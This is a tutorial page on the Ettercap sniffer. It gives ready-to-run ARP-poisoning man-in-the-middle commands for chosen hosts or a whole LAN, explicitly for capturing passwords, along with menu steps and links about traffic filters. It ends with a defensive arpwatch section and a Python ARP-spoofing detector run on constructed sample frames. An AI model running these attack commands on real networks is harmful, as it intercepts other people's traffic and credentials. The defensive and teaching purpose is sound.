Ettercap Sniffer
Invoking ettercap
#ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.100/
Invokes ettercap with the -T text interface (the -C curses and -G GTK interfaces are also available) and launches an ARP poisoning man-in-the-middle attack between the two designated hosts, 192.168.1.1 and 192.168.1.100.
A quick how to for text, curses and GUI modes can be found at:
http://ettercap.sourceforge.net/forum/viewtopic.php?t=2601&sid=d2a2f8fc10b949dbb0eea441202e79ed
Text mode: This is the easiest to use (and I think the easiest on the eye!). To ARP Poison the whole LAN, capturing passwords as you go, use:
# ettercap -Tq -M arp:remote //
T = Text mode
q = quiet - without this you'll see the raw packets which can be noisy and annoying.
M = Man-In-The-Middle
arp: = ARP Poisoning
remote = forward packets destined for the WAN (Internet, whatever)
// = Empty target specification; i.e. all hosts
Use 'q' to quit.
If you want to only do hosts 10.0.0.3, 10.0.0.5, 10.0.0.6 and 10.0.0.7 then you could use:
# ettercap -Tq -M arp:remote /10.0.0.3,5-7/
or
# ettercap -Tq -M arp:remote /10.0.0.3/ /10.0.0.5-7/
Curses mode: This is the one with the cursed interface. Use:
# ettercap -C
and then select the following options:
Sniff->Unified Sniffing eth0 (or whatever your i/f spec is)
Hosts->Scan for hosts
Start->Start Sniffing
Mitm->Arp poisoning remote
View->Connections
Mitm->Stop Mitm
Start->Stop Sniffing
Start->Exit to quit.
GTK+ mode: This is the one with the GTK+ interface. Use:
# ettercap -G
Then follow the same steps as for the Cursed interface.
Kev
_________________
_Please_ don't play on other people's networks; you wouldn't like it if they played on yours...
Filters
To make filters to inspect and re-craft traffic, see this example of making a filter in Ettercap:
http://www.irongeek.com/i.php?page=security/ettercapfilter
Also see the Remote Exploit forums and the ettercap forum for additional information on filters:
http://forums.remote-exploit.org/showthread.php?t=7681
http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833
Man in the Middle Defense
This site hosts arpwatch, which monitors and logs the IP-to-MAC mappings seen in ARP traffic on layer 2; a mapping that changes, or one MAC answering for several IPs, is how ARP poisoning and man-in-the-middle attacks show up.
#wget ftp://ftp.ee.lbl.gov/arpwatch.tar.gz
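To show what arpwatch is watching for, here is an added example (written for this page, not arpwatch's own code) that parses Ethernet/ARP reply frames, keeps an IP-to-MAC table, and raises an alert when a binding changes or one MAC claims several IPs. The frames are constructed sample data modelling the two hosts from the invocation above plus a third MAC answering for both; `build_arp_reply` and `watch` are names introduced here.

```python
import struct
from ipaddress import IPv4Address

ETH_P_ARP, ARP_REPLY = 0x0806, 2

def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Constructed Ethernet/ARP reply frame used as sample input (not a real capture)."""
    smac, tmac = (bytes.fromhex(m.replace(":", "")) for m in (sender_mac, target_mac))
    eth = tmac + smac + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    return eth + arp + smac + IPv4Address(sender_ip).packed + tmac + IPv4Address(target_ip).packed

def parse_arp_reply(frame):
    """Return (sender_ip, sender_mac) for an Ethernet/IPv4 ARP reply, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    if struct.unpack("!HHBBH", frame[14:22]) != (1, 0x0800, 6, 4, ARP_REPLY):
        return None
    return str(IPv4Address(frame[28:32])), frame[22:28].hex(":")

def watch(frames):
    """Replay frames through an IP->MAC table, arpwatch-style. Returns (alerts, table):
    one alert when an IP's MAC changes, one when a MAC ends up answering for several IPs."""
    table, alerts = {}, []
    for frame in frames:
        parsed = parse_arp_reply(frame)
        if parsed is None:
            continue  # requests and non-ARP traffic are ignored here
        ip, mac = parsed
        old = table.get(ip)
        if old is not None and old != mac:
            alerts.append(f"changed ethernet address: {ip} {old} -> {mac}")
        table[ip] = mac
    by_mac = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            alerts.append(f"one mac for several ips: {mac} {sorted(ips)}")
    return alerts, table

# Constructed scenario: the gateway (.1) and a host (.100) answer normally, then a
# third MAC answers for both addresses, which is what poisoning both ends looks like.
SAMPLE_FRAMES = [
    build_arp_reply("00:11:22:33:44:01", "192.168.1.1", "00:11:22:33:44:64", "192.168.1.100"),
    build_arp_reply("00:11:22:33:44:64", "192.168.1.100", "00:11:22:33:44:01", "192.168.1.1"),
    build_arp_reply("de:ad:be:ef:00:01", "192.168.1.1", "00:11:22:33:44:64", "192.168.1.100"),
    build_arp_reply("de:ad:be:ef:00:01", "192.168.1.100", "00:11:22:33:44:01", "192.168.1.1"),
]
```

Calling `watch(SAMPLE_FRAMES)` yields two "changed ethernet address" alerts followed by one "one mac for several ips" alert; feeding it frames read from a raw socket or a pcap instead of `SAMPLE_FRAMES` turns it into a live monitor.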
References
http://ettercap.sourceforge.net/forum/ Pretty good intro information here, etc.
http://www.securitypronews.com/securitypronews-24-20030623EtterCapARPSpoofingandBeyond.html